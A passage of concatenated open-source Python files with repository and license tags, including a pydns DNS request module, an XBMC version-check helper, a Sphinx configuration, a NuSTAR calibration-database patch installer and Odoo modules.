code.append(f)
code_str = "%s.%s.%s.%s.%s-%s" % (str(code[0]) + str(code[1]),
str(code[2]) + str(code[3]) + str(code[4]),
str(code[5]) + str(code[6]) + str(code[7]),
str(code[8]) + str(code[9]) + str(code[10]),
str(code[11]) + str(code[12]) + str(code[13]),
str(code[14]) + str(code[15]))
if code_len <= 3:
code_form = code_str[18 - code_len:21]
elif code_len > 3 and code_len <= 6:
code_form = code_str[17 - code_len:21]
elif code_len > 6 and code_len <= 9:
code_form = code_str[16 - code_len:21]
elif code_len > 9 and code_len <= 12:
code_form = code_str[15 - code_len:21]
elif code_len > 12 and code_len <= 14:
code_form = code_str[14 - code_len:21]
return code_form
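# Illustrative sketch (not part of the original module): format_code() computes
# two modulo-11 check digits for the zero-padded sequence number and returns a
# dotted, dash-suffixed code string trimmed to the length of the input. The
# value below is an arbitrary example sequence, not real data:
#
#   new_code = format_code('123')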
class Document(models.Model):
_inherit = 'myo.document'
code = fields.Char(string='Code', required=False, default=False,
help='Use "/" to get an automatic new Document Code.')
@api.model
def create(self, values):
if 'code' not in values or ('code' in values and values['code'] == '/'):
code_seq = self.pool.get('ir.sequence').next_by_code(self._cr, self._uid, 'myo.document.code')
values['code'] = format_code(code_seq)
return super(Document, self).create(values)
@api.multi
def write(self, values):
if 'code' in values and values['code'] == '/':
code_seq = self.pool.get('ir.sequence').next_by_code(self._cr, self._uid, 'myo.document.code')
values['code'] = format_code(code_seq)
return super(Document, self).write(values)
@api.one
def copy(self, default=None):
default = dict(default or {})
default.update({'code': '/', })
return super(Document, self).copy(default)
| agpl-3.0 |
sanghinitin/golismero | tools/theHarvester/discovery/DNS/Base.py | 24 | 11574 | """
$Id: Base.py,v 1.12.2.4 2007/05/22 20:28:31 customdesigned Exp $
This file is part of the pydns project.
Homepage: http://pydns.sourceforge.net
This code is covered by the standard Python License.
Base functionality. Request and Response classes, that sort of thing.
"""
import socket, string, types, time
import Type, Class, Opcode
import asyncore
class DNSError(Exception): pass
defaults = { 'protocol':'udp', 'port':53, 'opcode':Opcode.QUERY,
'qtype':Type.A, 'rd':1, 'timing':1, 'timeout': 30 }
defaults['server'] = []
def ParseResolvConf(resolv_path):
global defaults
try:
lines = open(resolv_path).readlines()
except:
print "error in path" + resolv_path
for line in lines:
line = string.strip(line)
if not line or line[0] == ';' or line[0] == '#':
continue
fields = string.split(line)
if len(fields) < 2:
continue
if fields[0] == 'domain' and len(fields) > 1:
defaults['domain'] = fields[1]
if fields[0] == 'search':
pass
if fields[0] == 'options':
pass
if fields[0] == 'sortlist':
pass
if fields[0] == 'nameserver':
defaults['server'].append(fields[1])
def DiscoverNameServers():
import sys
if sys.platform in ('win32', 'nt'):
import win32dns
defaults['server'] = win32dns.RegistryResolve()
else:
return ParseResolvConf()
class DnsRequest:
""" high level Request object """
def __init__(self, *name, **args):
self.donefunc = None
self.async = None
self.defaults = {}
self.argparse(name, args)
self.defaults = self.args
def argparse(self, name, args):
if not name and self.defaults.has_key('name'):
args['name'] = self.defaults['name']
if type(name) is types.StringType:
args['name'] = name
else:
if len(name) == 1:
if name[0]:
args['name'] = name[0]
for i in defaults.keys():
if not args.has_key(i):
if self.defaults.has_key(i):
args[i] = self.defaults[i]
else:
args[i] = defaults[i]
if type(args['server']) == types.StringType:
args['server'] = [args['server']]
self.args = args
def socketInit(self, a, b):
self.s = socket.socket(a, b)
def processUDPReply(self):
import time, select
if self.args['timeout'] > 0:
r, w, e = select.select([self.s], [], [], self.args['timeout'])
if not len(r):
raise DNSError, 'Timeout'
self.reply = self.s.recv(1024)
self.time_finish = time.time()
self.args['server'] = self.ns
return self.processReply()
def processTCPReply(self):
import time, Lib
self.f = self.s.makefile('r')
header = self.f.read(2)
if len(header) < 2:
raise DNSError, 'EOF'
count = Lib.unpack16bit(header)
self.reply = self.f.read(count)
if len(self.reply) != count:
raise DNSError, 'incomplete reply'
self.time_finish = time.time()
self.args['server'] = self.ns
return self.processReply()
def processReply(self):
import Lib
self.args['elapsed'] = (self.time_finish - self.time_start) * 1000
u = Lib.Munpacker(self.reply)
r = Lib.DnsResult(u, self.args)
r.args = self.args
#self.args=None # mark this DnsRequest object as used.
return r
#### TODO TODO TODO ####
# if protocol == 'tcp' and qtype == Type.AXFR:
# while 1:
# header = f.read(2)
# if len(header) < 2:
# print '========== EOF =========='
# break
# count = Lib.unpack16bit(header)
# if not count:
# print '========== ZERO COUNT =========='
# break
# print '========== NEXT =========='
# reply = f.read(count)
# if len(reply) != count:
# print '*** Incomplete reply ***'
# break
# u = Lib.Munpacker(reply)
# Lib.dumpM(u)
def conn(self):
self.s.connect((self.ns, self.port))
def req(self, *name, **args):
" needs a refactoring "
import time, Lib
self.argparse(name, args)
#if not self.args:
# raise DNSError,'reinitialize request before reuse'
protocol = self.args['protocol']
self.port = self.args['port']
opcode = self.args['opcode']
rd = self.args['rd']
server = self.args['server']
if type(self.args['qtype']) == types.StringType:
try:
qtype = getattr(Type, string.upper(self.args['qtype']))
except AttributeError:
raise DNSError, 'unknown query type'
else:
qtype = self.args['qtype']
if not self.args.has_key('name'):
print self.args
raise DNSError, 'nothing to lookup'
qname = self.args['name']
if qtype == Type.AXFR:
print 'Query type AXFR, protocol forced to TCP'
protocol = 'tcp'
#print 'QTYPE %d(%s)' % (qtype, Type.typestr(qtype))
m = Lib.Mpacker()
# jesus. keywords and default args would be good. TODO.
m.addHeader(0,
0, opcode, 0, 0, rd, 0, 0, 0,
1, 0, 0, 0)
m.addQuestion(qname, qtype, Class.IN)
self.request = m.getbuf()
try:
if protocol == 'udp':
self.sendUDPRequest(server)
else:
self.sendTCPRequest(server)
except socket.error, reason:
raise DNSError, reason
if self.async:
return None
else:
return self.response
def sendUDPRequest(self, server):
"refactor me"
self.response = None
self.socketInit(socket.AF_INET, socket.SOCK_DGRAM)
for self.ns in server:
try:
# TODO. Handle timeouts &c correctly (RFC)
#self.s.connect((self.ns, self.port))
self.conn()
self.time_start = time.time()
if not self.async:
self.s.send(self.request)
self.response = self.processUDPReply()
#except socket.error:
except None:
continue
break
if not self.response:
if not self.async:
raise DNSError, 'no working nameservers found'
def sendTCPRequest(self, server):
" do the work of sending a TCP request "
import time, Lib
self.response = None
for self.ns in server:
try:
self.socketInit(socket.AF_INET, socket.SOCK_STREAM)
self.time_start = time.time()
self.conn()
self.s.send(Lib.pack16bit(len(self.request)) + self.request)
self.s.shutdown(1)
self.response = self.processTCPReply()
except socket.error:
continue
break
if not self.response:
raise DNSError, 'no working nameservers found'
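# Illustrative usage sketch (not part of the original library): a plain
# synchronous A-record lookup. 'example.com' is a placeholder host name, and
# the .answers attribute is assumed from the DnsResult interface in DNS.Lib.
def _example_lookup(hostname='example.com'):
    DiscoverNameServers()
    request = DnsRequest(name=hostname, qtype='A')
    response = request.req()
    return [answer['data'] for answer in response.answers]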
#class DnsAsyncRequest(DnsRequest):
class DnsAsyncRequest(DnsRequest, asyncore.dispatcher_with_send):
" an asynchronous request object. out of date, probably broken "
def __init__(self, *name, **args):
DnsRequest.__init__(self, *name, **args)
# XXX todo
if args.has_key('done') and args['done']:
self.donefunc = args['done']
else:
self.donefunc = self.showResult
#self.realinit(name,args) # XXX todo
self.async = 1
def conn(self):
import time
self.connect((self.ns, self.port))
self.time_start = time.time()
if self.args.has_key('start') and self.args['start']:
asyncore.dispatcher.go(self)
def socketInit(self, a, b):
self.create_socket(a, b)
asyncore.dispatcher.__init__(self)
self.s = self
def handle_read(self):
if self.args['protocol'] == 'udp':
self.response = self.processUDPReply()
if self.donefunc:
apply(self.donefunc, (self,))
def handle_connect(self):
self.send(self.request)
def handle_write(self):
pass
def showResult(self, *s):
self.response.show()
#
# $Log: Base.py,v $
# Revision 1.12.2.4 2007/05/22 20:28:31 customdesigned
# Missing import Lib
#
# Revision 1.12.2.3 2007/05/22 20:25:52 customdesigned
# Use socket.inetntoa,inetaton.
#
# Revision 1.12.2.2 2007/05/22 20:21:46 customdesigned
# Trap socket error
#
# Revision 1.12.2.1 2007/05/22 20:19:35 customdesigned
# Skip bogus but non-empty lines in resolv.conf
#
# Revision 1.12 2002/04/23 06:04:27 anthonybaxter
# attempt to refactor the DNSRequest.req method a little. after doing a bit
# of this, I've decided to bite the bullet and just rewrite the puppy. will
# be checkin in some design notes, then unit tests and then writing the sod.
#
# Revision 1.11 2002/03/19 13:05:02 anthonybaxter
# converted to class based exceptions (there goes the python1.4 compatibility :)
#
# removed a quite gross use of 'eval()'.
#
# Revision 1.10 2002/03/19 12:41:33 anthonybaxter
# tabnannied and reindented everything. 4 space indent, no tabs.
# yay.
#
# Revision 1.9 2002/03/19 12:26:13 anthonybaxter
# death to leading tabs.
#
# Revision 1.8 2002/03/19 10:30:33 anthonybaxter
# first round of major bits and pieces. The major stuff here (summarised
# from my local, off-net CVS server :/ this will cause some oddities with
# the
#
# tests/testPackers.py:
# a large slab of unit tests for the packer and unpacker code in DNS.Lib
#
# DNS/Lib.py:
# placeholder for addSRV.
# added 'klass' to addA, make it the same as the other A* records.
# made addTXT check for being passed a string, turn it into a length 1 list.
# explicitly check for adding a string of length > 255 (prohibited).
# a bunch of cleanups from a first pass with pychecker
# new code for pack/unpack. the bitwise stuff uses struct, for a smallish
# (disappointly small, actually) improvement, while addr2bin is much
# much faster now.
#
# DNS/Base.py:
# added DiscoverNameServers. This automatically does the right thing
# on unix/ win32. No idea how MacOS handles this. *sigh*
# Incompatible change: Don't use ParseResolvConf on non-unix, use this
# function, instead!
# a bunch of cleanups from a first pass with pychecker
#
# Revision 1.5 2001/08/09 09:22:28 anthonybaxter
# added what I hope is win32 resolver lookup support. I'll need to try
# and figure out how to get the CVS checkout onto my windows machine to
# make sure it works (wow, doing something other than games on the
# windows machine :)
#
# Code from [email protected]
# win32dns.py from
# http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/66260
#
# Really, ParseResolvConf() should be renamed "FindNameServers" or
# some such.
#
# Revision 1.4 2001/08/09 09:08:55 anthonybaxter
# added identifying header to top of each file
#
# Revision 1.3 2001/07/19 07:20:12 anthony
# Handle blank resolv.conf lines.
# Patch from Bastian Kleineidam
#
# Revision 1.2 2001/07/19 06:57:07 anthony
# cvs keywords added
#
#
| gpl-2.0 |
station7/xbmc | addons/service.xbmc.versioncheck/lib/common.py | 82 | 6948 | # -*- coding: utf-8 -*-
#
# Copyright (C) 2013 Team-XBMC
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
import os
import unicodedata
import xbmc
import xbmcaddon
import xbmcgui
import xbmcvfs
ADDON = xbmcaddon.Addon()
ADDONVERSION = ADDON.getAddonInfo('version')
ADDONNAME = ADDON.getAddonInfo('name')
ADDONPATH = ADDON.getAddonInfo('path').decode('utf-8')
ADDONPROFILE = xbmc.translatePath( ADDON.getAddonInfo('profile') ).decode('utf-8')
ICON = ADDON.getAddonInfo('icon')
monitor = xbmc.Monitor()
# Fixes unicode problems
def string_unicode(text, encoding='utf-8'):
try:
text = unicode( text, encoding )
except:
pass
return text
def normalize_string(text):
try:
text = unicodedata.normalize('NFKD', string_unicode(text)).encode('ascii', 'ignore')
except:
pass
return text
def localise(id):
string = normalize_string(ADDON.getLocalizedString(id))
return string
def log(txt):
if isinstance (txt,str):
txt = txt.decode("utf-8")
message = u'%s: %s' % ("Version Check", txt)
xbmc.log(msg=message.encode("utf-8"), level=xbmc.LOGDEBUG)
def get_password_from_user():
keyboard = xbmc.Keyboard("", ADDONNAME + "," +localise(32022), True)
keyboard.doModal()
if (keyboard.isConfirmed()):
pwd = keyboard.getText()
return pwd
def message_upgrade_success():
xbmc.executebuiltin("XBMC.Notification(%s, %s, %d, %s)" %(ADDONNAME,
localise(32013),
15000,
ICON))
def message_restart():
if dialog_yesno(32014):
xbmc.executebuiltin("RestartApp")
def dialog_yesno(line1 = 0, line2 = 0):
return xbmcgui.Dialog().yesno(ADDONNAME,
localise(line1),
localise(line2))
def upgrade_message(msg, oldversion, upgrade, msg_current, msg_available):
wait_for_end_of_video()
if ADDON.getSetting("lastnotified_version") < ADDONVERSION:
xbmcgui.Dialog().ok(ADDONNAME,
localise(msg),
localise(32001),
localise(32002))
#ADDON.setSetting("lastnotified_version", ADDONVERSION)
else:
log("Already notified one time for upgrading.")
def upgrade_message2( version_installed, version_available, version_stable, oldversion, upgrade,):
# shorten releasecandidate to rc
if version_installed['tag'] == 'releasecandidate':
version_installed['tag'] = 'rc'
if version_available['tag'] == 'releasecandidate':
version_available['tag'] = 'rc'
# convert json-rpc result to strings for usage
msg_current = '%i.%i %s%s' %(version_installed['major'],
version_installed['minor'],
version_installed['tag'],
version_installed.get('tagversion',''))
msg_available = version_available['major'] + '.' + version_available['minor'] + ' ' + version_available['tag'] + version_available.get('tagversion','')
msg_stable = version_stable['major'] + '.' + version_stable['minor'] + ' ' + version_stable['tag'] + version_stable.get('tagversion','')
msg = localise(32034) %(msg_current, msg_available)
wait_for_end_of_video()
# hack: convert current version number to stable string
# so users don't get notified again. remove in future
if ADDON.getSetting("lastnotified_version") == '0.1.24':
ADDON.setSetting("lastnotified_stable", msg_stable)
# Show different dialogs depending if there's a newer stable available.
# Also split them between xbmc and kodi notifications to reduce possible confusion.
# People will find out once they visit the website.
# For stable only notify once and when there's a newer stable available.
# Ignore any add-on updates as those only count for != stable
if oldversion == 'stable' and ADDON.getSetting("lastnotified_stable") != msg_stable:
if xbmcaddon.Addon('xbmc.addon').getAddonInfo('version') < "13.9.0":
xbmcgui.Dialog().ok(ADDONNAME,
msg,
localise(32030),
localise(32031))
else:
xbmcgui.Dialog().ok(ADDONNAME,
msg,
localise(32032),
localise(32033))
ADDON.setSetting("lastnotified_stable", msg_stable)
elif oldversion != 'stable' and ADDON.getSetting("lastnotified_version") != msg_available:
if xbmcaddon.Addon('xbmc.addon').getAddonInfo('version') < "13.9.0":
# point them to xbmc.org
xbmcgui.Dialog().ok(ADDONNAME,
msg,
localise(32035),
localise(32031))
else:
#use kodi.tv
xbmcgui.Dialog().ok(ADDONNAME,
msg,
localise(32035),
localise(32033))
# older skins don't support a text field in the OK dialog.
# let's use split lines for now. see code above.
'''
msg = localise(32034) %(msg_current, msg_available)
if oldversion == 'stable':
msg = msg + ' ' + localise(32030)
else:
msg = msg + ' ' + localise(32035)
msg = msg + ' ' + localise(32031)
xbmcgui.Dialog().ok(ADDONNAME, msg)
#ADDON.setSetting("lastnotified_version", ADDONVERSION)
'''
ADDON.setSetting("lastnotified_version", msg_available)
else:
log("Already notified one time for upgrading.")
def wait_for_end_of_video():
# Don't show notify while watching a video
while xbmc.Player().isPlayingVideo() and not monitor.abortRequested():
if monitor.waitForAbort(1):
# Abort was requested while waiting. We should exit
break
i = 0
while i < 10 and not monitor.abortRequested():
if monitor.waitForAbort(1):
# Abort was requested while waiting. We should exit
break
i += 1 | gpl-2.0 |
sbesson/openmicroscopy | docs/sphinx-api/conf.py | 6 | 4384 | # -*- coding: utf-8 -*-
#
# OMERO.py API documentation build configuration file, created by
# sphinx-quickstart on Mon Jul 23 12:22:32 2012.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import datetime
import sys, os
import os.path
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath(os.path.join('..','..','dist','lib','python')))
sys.path.insert(0, os.path.abspath(os.path.join('..','..','dist','lib','python','omeroweb')))
os.environ['DJANGO_SETTINGS_MODULE'] = 'omeroweb.settings'
author = u'The Open Microscopy Environment'
# -- General configuration -----------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.autosummary', 'sphinx.ext.todo', 'sphinx.ext.coverage']
autodoc_default_flags = ['members', 'undoc-members', 'private-members']
# General information about the project.
project = u'OMERO.py API'
targetname = 'OmeroPyAPI'
title = project + u' Documentation'
master_doc = 'index'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
version = os.environ.get('OMERO_RELEASE', 'UNKNOWN')
release = os.environ.get('OMERO_RELEASE', 'UNKNOWN')
# -- Options for HTML output ---------------------------------------------------
html_theme = 'api_theme'
# The suffix of source filenames.
source_suffix = '.rst'
# Output file base name for HTML help builder.
htmlhelp_basename = project+ ' doc'
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = ['../sphinx/common/themes', 'themes']
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', targetname + '.tex', title, author, 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'omeropyapi', title, author, 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', targetname, title, author, targetname,
'One line description of project.', 'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {'http://docs.python.org/': None}
| gpl-2.0 |
mfacorcoran/pycaldb | nustar_caldb/nustar_caldb_patch.py | 1 | 9035 | def patch_nustar_caldb(version,
nupatchserver = "hassif.caltech.edu",
nupatchworkdir = "/pub/nustar/pipeline",
caldb = "/FTP/caldb",
caldbstage = "/FTP/caldb/staging",
                       ck_file_exists=True):
"""
CALLING SEQUENCE:
patch_nustar_caldb(version,
nupatchserver = "hassif.caltech.edu",
nupatchworkdir = "/pub/nustar/pipeline",
caldb = "/FTP/caldb",
caldbstage = "/FTP/caldb/staging")
The following is from /web_chroot/FTP/.caldb_staging/data/nustar/README_rev1.txt
20131028
========
installing patch version 20131007 - STEPS:
a) first created a full version of the existing nustar caldb in the
/FTP/caldb/data/nustar in the nustar/versions are via rsync:
[caldbmgr]: pwd
/web_chroot/FTP/.caldb_staging/data/nustar/versions
[caldbmgr]: mkdir 20131007
[caldbmgr]: cd 20131007
[caldbmgr]: rsync -avz 20130509/CALDB/data/nustar/fpm/bcf .
[caldbmgr]: rsync -avz 20130509/CALDB/data/nustar/fpm/cpf .
[caldbmgr]: rsync -avz 20130509/CALDB/data/nustar/fpm/index .
b) wget the patch (using the location given in Brian Grefenstette's e-mail):
[caldbmgr]: cd /FTP/caldb/staging/data/nustar/versions/20131007/
[caldbmgr]: wget ftp://hassif.srl.caltech.edu/pub/nustar/pipeline/20131007/NUSTARCALDB_patch20131007.tgz
c) Untar the patch:
[caldbmgr]: pwd
/web_chroot/FTP/.caldb_staging/data/nustar/versions/20131007
[caldbmgr]: ls
fpm NUSTARCALDB_patch20131007.tgz
[caldbmgr]: tar -zxvf NUSTARCALDB_patch20131007.tgz
fpm/caldb.indx
fpm/index/caldb.indx20131007
fpm/bcf/arf/nuA20100101v006.arf
fpm/bcf/arf/nuB20100101v006.arf
... stuff deleted ...
fpm/bcf/instrument/nuAhkrange05_20100101v005.fits
fpm/bcf/instrument/nuAhkrange04_20100101v005.fits
fpm/bcf/instrument/nuAhkrange03_20100101v005.fits
fpm/bcf/instrument/nuAhkrange02_20100101v005.fits
c) then link the (now full) 20131007 version to staging/data/nustar/fpm:
[caldbmgr]: pwd
/web_chroot/FTP/.caldb_staging/data/nustar
[caldbmgr]: ln -nfs versions/20131007/fpm .
[caldbmgr]: ls -l
total 12
lrwxrwxrwx 1 caldbmgr caldb 21 Oct 28 15:31 fpm -> versions/20131007/fpm
-rw-r--r-- 1 caldbmgr caldb 1909 Oct 28 15:27 README.txt
drwxr-xr-x 2 caldbmgr caldb 4096 Oct 28 15:09 to_ingest
drwxr-xr-x 7 caldbmgr caldb_stage 4096 Oct 28 15:14 versions
d) from Brian's e-mail list of new files in the patch, created caldb_update_nustar_20131007.txt in the "to_ingest" subdirectory:
[caldbmgr]: pwd
/web_chroot/FTP/.caldb_staging/data/nustar/to_ingest
[caldbmgr]: ls -l
total 16
-rw-r--r-- 1 caldbmgr caldb 8839 Aug 14 11:27 caldb_update_nustar_20130509.txt
-rw-r--r-- 1 caldbmgr caldb 1636 Oct 28 15:09 caldb_update_nustar_20131007.txt
lrwxrwxrwx 1 caldbmgr caldb 32 Aug 14 11:02 caldb_update.txt -> caldb_update_nustar_20130509.txt
e) to ingest the data (as in other missions) run /web_chroot/FTP/caldb/local/scripts/DATA_DELIVERIES/nustar_caldbupdate.csh
    :param version: string in 'YYYYMMDD' format, from nustar patch notification (from BG)
    :param nupatchserver: name of the FTP server hosting the patch tar file
    :param nupatchworkdir: directory on the patch server where the patch tar file is located, from BG
    :param caldb: location where the full NuSTAR caldb is stored
    :param caldbstage: location of caldb staging area
    :param ck_file_exists: if set, verify that every file listed in the new caldb.indx exists in the staged caldb
    :return:
"""
import os
import ftputil
import tarfile
import datetime
import shutil
from pycaldb import ck_file_existence
from astropy.io import fits as pyfits
#
# create patch install directory
#
versiondir=caldbstage+"/data/nustar/versions/"+version.strip().lower()
patchinstalldir = versiondir
if os.path.isdir(versiondir):
ans = raw_input("{0} exists; Do you want to remove it (Y/n)? ".format(versiondir))
try:
            if ans.upper().strip()[0] != "N":
shutil.rmtree(versiondir)
print("Creating clean {0} directory".format(patchinstalldir))
os.makedirs(patchinstalldir)
except IndexError: # user hit <CR> generating an empty string
shutil.rmtree(versiondir)
print("Creating clean {0} directory".format(patchinstalldir))
os.makedirs(patchinstalldir)
else:
print("Creating {0} directory".format(patchinstalldir))
os.makedirs(patchinstalldir)
#
#create a full version of the existing nustar caldb in the
# $CALDB/data/nustar in the nustar/versions are via rsync:
# cdirs=['bcf','cpf','index', 'caldb.indx']
# for c in cdirs:
# cmd = "rsync -avz " + caldb + "/data/nustar/fpm/" + c + " " + patchinstalldir + "/fpm"
# if os.path.isdir(patchinstalldir+'/fpm/'+c):
# ans = raw_input('\nDirectory '+patchinstalldir+'/fpm/'+c+' Exists. Remove it and re-download (Y/n)? ')
# if ans.lower().strip()[0] == 'y':
# shutil.rmtree(patchinstalldir+'/'+c)
# else:
# cmd = "echo keeping pre-existing directory "+patchinstalldir+'/fpm/'+c
# print (cmd)
# os.system(cmd)
#
# get the patch file
#
host = ftputil.FTPHost(nupatchserver,'anonymous','[email protected]')
patchfiledir = nupatchworkdir+'/'+version.strip()
patchfile = 'NUSTARCALDB_patch'+version.strip()+'.tgz'
print('\nDownloading {0}...'.format(patchfile))
try:
host.download(patchfiledir+'/'+patchfile,patchinstalldir+'/'+patchfile,mode='b') # need mode flag for ftputil<3.0
except TypeError:
host.download(patchfiledir + '/' + patchfile, patchinstalldir + '/' + patchfile) # if mode flag not present (ftputil>=3.0)
#
# untar the file
#
print('\nExtracting {0} to {1}'.format(patchfile, patchinstalldir))
ptf = tarfile.open(patchinstalldir+'/'+patchfile)
ptf.extractall(patchinstalldir)
newfiles = ptf.getnames()
#
# Link the updated version to staging/data/nustar/fpm:
#
#
dst = caldbstage+'/data/nustar/fpm'
if os.path.islink(dst):
os.remove(dst)
print "Creating symbolic link from {0} to {1}".format(patchinstalldir+"/fpm", dst)
try:
os.symlink(patchinstalldir+'/fpm', dst)
except:
print "Problem creating symbolic link to "+dst+"; Returning"
return
#
# check that all files in the cif exist in the new caldb
#
if ck_file_exists:
print ("\nChecking existence of files in the caldb.indx file...")
cif = pyfits.open(caldbstage+'/data/nustar/fpm/caldb.indx')
missing = ck_file_existence(cif, caldb=caldbstage, quiet=True)
if len(missing) > 0:
print "\nThese files are missing from the caldb:"
for f in missing:
print f
#
# create update file in staging/nustar/to_ingest directory
#
update_txt='from: [email protected]\n' \
'Subject: caldb update nustar '+version.strip()+'\n' \
'Date: '+datetime.datetime.now().strftime("%Y-%m-%d %H:%M")+'\n' \
'To: [email protected]\n\n' \
'instrument=fpm\n' \
'caldbindexfile=caldb.indx'+version.strip()+'\n\n' \
'newfile\n'
for f in newfiles: # get file list from patch tarfile
name=f.split('fpm/')[1]
if not 'caldb.indx' in name.strip().lower(): # don't include caldb.indx files in ingest note
update_txt=update_txt+name+"\n"
update_txt=update_txt+'endnewfile\n'
ingestfilename = 'caldb_update_nustar_'+version.strip()+'.txt'
ingestfile = caldbstage+'/data/nustar/to_ingest/'+ingestfilename
print('Creating {0}'.format(ingestfile))
fingest = open(ingestfile,'w')
fingest.write(update_txt)
fingest.close()
#print('\nEdit {0} and enter list of new files from the update e-mail from BG'.format(ingestfile))
#
# make symlink to caldb_update.txt file
#
curdir=os.getcwd()
to_ingestdir = caldbstage+"/data/nustar/to_ingest"
updatefile='caldb_update.txt'
os.chdir(to_ingestdir)
print "Creating symbolic link from {0} to {1} in {2}".format(ingestfilename, updatefile,to_ingestdir)
if os.path.islink(updatefile):
os.remove(updatefile)
try:
os.symlink(ingestfile, updatefile)
except:
print "Problem creating symbolic link to "+updatefile+"; Returning"
return
os.chdir(curdir)
return
if __name__ == "__main__":
#
# for sshfs mounted directories
#
caldb="/fuse/caldb"
stage = '/fuse/caldb_stage'
patch_nustar_caldb('20160606', caldb=caldb, caldbstage=stage, ck_file_exists=False)
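# Note (illustrative, not part of the original script): after patch_nustar_caldb()
# has staged the patch, the final ingest step (step "e" in the README excerpt
# quoted in the docstring) is still run separately by the caldb manager, e.g.
#   /web_chroot/FTP/caldb/local/scripts/DATA_DELIVERIES/nustar_caldbupdate.csh
# which is assumed to consume the caldb_update.txt symlink created above.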
| gpl-2.0 |
chand3040/sree_odoo | openerp/addons/l10n_ar/__init__.py | 2120 | 1456 | # -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (c) 2011 Cubic ERP - Teradata SAC. (http://cubicerp.com).
#
# WARNING: This program as such is intended to be used by professional
# programmers who take the whole responsibility of assessing all potential
# consequences resulting from its eventual inadequacies and bugs.
# End users who are looking for a ready-to-use solution with commercial
# guarantees and support are strongly advised to contract a Free Software
# Service Company
#
# This program is Free Software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
##############################################################################
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
camptocamp/ngo-addons-backport | addons/resource/resource.py | 35 | 25745 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import pytz
from datetime import datetime, timedelta
from dateutil import rrule
import math
from faces import *
from openerp.osv import fields, osv
from openerp.tools.float_utils import float_compare
from openerp.tools.translate import _
from itertools import groupby
from operator import itemgetter
class resource_calendar(osv.osv):
_name = "resource.calendar"
_description = "Resource Calendar"
_columns = {
'name' : fields.char("Name", size=64, required=True),
'company_id' : fields.many2one('res.company', 'Company', required=False),
'attendance_ids' : fields.one2many('resource.calendar.attendance', 'calendar_id', 'Working Time'),
'manager' : fields.many2one('res.users', 'Workgroup Manager'),
}
_defaults = {
'company_id': lambda self, cr, uid, context: self.pool.get('res.company')._company_default_get(cr, uid, 'resource.calendar', context=context)
}
def working_hours_on_day(self, cr, uid, resource_calendar_id, day, context=None):
"""Calculates the Working Total Hours based on Resource Calendar and
given working day (datetime object).
@param resource_calendar_id: resource.calendar browse record
@param day: datetime object
@return: returns the working hours (as float) men should work on the given day if is in the attendance_ids of the resource_calendar_id (i.e if that day is a working day), returns 0.0 otherwise
"""
res = 0.0
for working_day in resource_calendar_id.attendance_ids:
if (int(working_day.dayofweek) + 1) == day.isoweekday():
res += working_day.hour_to - working_day.hour_from
return res
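    # Illustrative example (sketch, not part of the original module): for a
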